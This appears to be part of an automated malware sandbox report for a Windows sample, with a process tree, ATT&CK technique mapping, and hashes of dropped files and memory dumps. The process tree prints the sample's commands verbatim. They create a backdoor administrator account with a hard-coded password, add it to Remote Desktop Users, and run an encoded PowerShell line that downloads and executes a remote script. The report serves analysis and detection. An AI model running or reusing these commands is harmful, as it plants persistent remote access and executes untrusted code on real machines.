- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:4416
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FRAVVDAE$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:1284
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FRAVVDAE$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1236

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:3396
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:4916

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc br3ioM93
1⤵
PID:1140
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc br3ioM93
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc br3ioM93
    3⤵
    PID:4752

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4636
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3952

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1608
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:352

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2696
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnncrout.age.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
db8de11b906843e62188d170711bddc3

SHA1
427ed4be90b2117a702f9df67f2d7817ea919f79

SHA256
90e9f4ffdb2ab1ef150c4bc411da031c9479bd8675901fb9726a959701cb6e4e

SHA512
d4d1789ca1765df1a2c472a52f811c298ce3601658cf47a31ee3853dc0daef2964ed50101762c91c8525f5404adc86df718b531c67b0d7065566770fd5f77c45

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
1227375b9491eeda0d50854a3dc592a3

SHA1
7ea8a29f5eb2d0639170a2d6b60eb5c8d304ed13

SHA256
e67bfa2e36dc3e60ec7eedcc723a246ec4509abeb67c6a7961dcfe4f8405d317

SHA512
68f1528573d5e57b55c7f91012a8f7849b8ef77029192975d25c24fa22180da7c172b1260990ae205e8da8e7752d57b69e7a28a500d35b282d81b6faf45b29b8

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI75E.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
memory/1712-27-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/1712-28-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/1712-16-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/1712-26-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-13-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-15-0x0000017673220000-0x000001767342A000-memory.dmp

Filesize
2.0MB

Download
memory/4612-29-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-39-0x00007FFF06BF3000-0x00007FFF06BF5000-memory.dmp

Filesize
8KB

Download
memory/4612-49-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-51-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-14-0x0000017672E90000-0x0000017673006000-memory.dmp

Filesize
1.5MB

Download
memory/4612-0-0x00007FFF06BF3000-0x00007FFF06BF5000-memory.dmp

Filesize
8KB

Download
memory/4612-12-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-11-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-10-0x0000017672A80000-0x0000017672AA2000-memory.dmp

Filesize
136KB

Download
memory/4612-110-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-115-0x00007FFF06BF0000-0x00007FFF076B1000-memory.dmp

Filesize
10.8MB

Download